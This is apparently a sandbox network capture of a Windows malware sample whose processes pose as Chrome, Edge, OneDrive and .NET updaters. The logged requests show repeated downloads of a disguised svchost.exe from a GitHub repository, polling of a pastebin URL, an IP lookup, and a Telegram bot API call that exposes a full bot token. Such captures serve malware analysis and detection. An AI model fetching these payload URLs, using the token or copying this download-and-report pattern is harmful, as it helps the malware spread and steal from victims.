Connection: keep-alive
Content-Length: 65024
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4AA:1F1AED:272272:34C9AC:67824C0C
Accept-Ranges: bytes
Date: Sat, 11 Jan 2025 10:46:36 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1736592396.043992,VS0,VE130
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c2d1d0801d85b4be737feafcd54683788ea629b8
Expires: Sat, 11 Jan 2025 10:51:36 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

update.dotnet.exe

Remote address:

185.199.109.133:443

Request

GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 65024
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4AA:1F1AED:272272:34C9AC:67824C0C
Accept-Ranges: bytes
Date: Sat, 11 Jan 2025 10:46:39 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1736592400.998617,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ffbc58742cef87e47de669012a14534b7b69434e
Expires: Sat, 11 Jan 2025 10:51:39 GMT
Source-Age: 4
GET

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

update.dotnet.exe

Remote address:

185.199.109.133:443

Request

GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 65024
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4AA:1F1AED:272272:34C9AC:67824C0C
Accept-Ranges: bytes
Date: Sat, 11 Jan 2025 10:46:46 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1736592407.546670,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f08fef692c2128debfcc822809d3cb5a689e4d79
Expires: Sat, 11 Jan 2025 10:51:46 GMT
Source-Age: 11
GET

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

update.dotnet.exe

Remote address:

185.199.109.133:443

Request

GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 65024
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4AA:1F1AED:272272:34C9AC:67824C0C
Accept-Ranges: bytes
Date: Sat, 11 Jan 2025 10:46:52 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 3
X-Timer: S1736592413.713835,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 8fb9f2b0e4764de76e4fe1f286be4485835287f3
Expires: Sat, 11 Jan 2025 10:51:52 GMT
Source-Age: 17
GET

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

update.dotnet.exe

Remote address:

185.199.109.133:443

Request

GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 65024
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: C4AA:1F1AED:272272:34C9AC:67824C0C
Accept-Ranges: bytes
Date: Sat, 11 Jan 2025 10:46:57 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 4
X-Timer: S1736592417.431957,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6f4bc0e2770903e3cf1d8e078ba6153730a38b7d
Expires: Sat, 11 Jan 2025 10:51:57 GMT
Source-Age: 21
DNS

pastebin.com

msedge.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.3.235

pastebin.com

IN A

104.20.4.235

pastebin.com

IN A

172.67.19.24
GET

https://pastebin.com/raw/RPPi3ByL

Chrome Update.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6965
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: LgaRzAmWWTxOuLM+/dSDXyK14aTmS390nuHBXBJZ+fxPhGZPf+5/ml6o+wicoUmFJBh0/slSCP9GV3zWn4mQccKAnn+6WO/xUqx0Usy3fNk=$DNVvZT1CxANMh0zmNejanA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900452ebdd98ef4c-LHR
DNS

133.109.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.109.199.185.in-addr.arpa

IN PTR

Response

133.109.199.185.in-addr.arpa

IN PTR

cdn-185-199-109-133githubcom
DNS

235.3.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.3.20.104.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

Chrome Update.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7221
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: i7bAU/OwzOv5RL0Z0iMaKmk+02FNw3yVNnMQaPgNwFc2kMZFBxsQbjxaatqZ2AFE/R1QWlX7l2t/FGZjN9eaQsKe4Mm3+nDHUrA7c0+I2D8=$w1OGZsn7joX/+hWjkHS7kw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900452ff3d68ef21-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6965
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: Q+Y6BtNqGVr38eBom2WcNy5O9Zr3d+Kbh7tQfWDzyEcvttkdbJJ+/uJcoU24Q/60FXSY/hcfUhAbC4CSbVnzafyqVruN3OPrrhGeVOUKr3Y=$VEHVscd6CsOIAApBrFWVFw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453017fa49498-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6987
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: hv7n8hmhslF4YjEYea+X0ImbzTcjSeuumZ68ZURL61nvPpKgQ6pIdHJV5rXRDsdt+l6b34Mnb/4vWK+CDgVBvUWonz6K92x15Ki5ESt6l3M=$QiYQwn51U1KtnMJ8RRwsZg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900453018a179551-LHR
DNS

api.telegram.org

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/getMe

update.dotnet.exe

Remote address:

149.154.167.220:443

Request

GET /bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/getMe HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 10:46:41 GMT
Content-Type: application/json
Content-Length: 284
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://pastebin.com/raw/RPPi3ByL

Chrome Update.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: zfzc6jZG9IC+IJ/VmllwUGduBtZo5L125dp+ZDZ+UReLD8x7WbkKNhjffqWiIlJd+LtSXqAuVgDguzJwuK9NfBYLFGIuGFqIM80Ta3Bp8O8=$IIRvBP0Rah/ScPqjeKDuWg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045312aa879527-LHR
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: M65XfXi2HZB4Ao3Qlfe+FV5GNcvsghVFM81N26RPE/Q8OGj25p8k6nA4zKCcdAGYmwUaZUz2l7hfBV+iQ7szQvAXZoILvZXps8IR+ey8upk=$maSQGPAOFMOHtKGzqCRaHg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045314e9966524-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: lKFrb0D7NsAISpKNp9MbQwPmd36GRO2zMVMXHtySv4vT7Yfryag57gg4vpomsEPOqMiV0EagxXcs4BReQHj0UXLlMgIo014AYWJZDV476ok=$+0i4pFzTyDAxT9m99NWizw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045314e9f393f9-LHR
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CJaCywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGJSYibwGIjBvFd1XZXcZzkAlGvhx1t0mVz9Tcr5gFXeVoR-sVx6YeFWK9YHo8dhSL1npp_mOleYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGJSYibwGIjBvFd1XZXcZzkAlGvhx1t0mVz9Tcr5gFXeVoR-sVx6YeFWK9YHo8dhSL1npp_mOleYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGJSYibwGIjCerxmixyYCnxTOwH_cHtZauzue7naEHLMCYHWw681yeHM7EamqDE2LJlfxa5CeEVYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGJSYibwGIjCerxmixyYCnxTOwH_cHtZauzue7naEHLMCYHWw681yeHM7EamqDE2LJlfxa5CeEVYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGJSYibwGIjDqseJLRQkXakJ03iBq27Iw21_izUHh-cuRrOiO4O54QcuEeqe_bHOSt3D5I-r93dgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGJSYibwGIjDqseJLRQkXakJ03iBq27Iw21_izUHh-cuRrOiO4O54QcuEeqe_bHOSt3D5I-r93dgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
x-client-data: CJaCywE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

3.178.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.178.250.142.in-addr.arpa

IN PTR

Response

3.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f31e100net
DNS

icanhazip.com

update.dotnet.exe

Remote address:

8.8.8.8:53

Request

icanhazip.com

IN A

Response

icanhazip.com

IN A

104.16.184.241

icanhazip.com

IN A

104.16.185.241
GET

http://icanhazip.com/

update.dotnet.exe

Remote address:

104.16.184.241:80

Request

GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 11 Jan 2025 10:46:45 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=k_IVC.9pI6qyHkODQSodfDCVu1p0wNMMUcxj6VM6o6E-1736592405-1.0.1.1-wj6FXJ5dlj8VmNye2wxxTzBpl.82EescM9qFQpq3OYxKHj_A4MLesHd5aAKVN44V0BLoEYqfVopIAYVc9qv6tg; path=/; expires=Sat, 11-Jan-25 11:16:45 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 90045325bfd6cd3d-LHR
alt-svc: h3=":443"; ma=86400
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

241.184.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.184.16.104.in-addr.arpa

IN PTR

Response
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:46:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7285
Connection: close
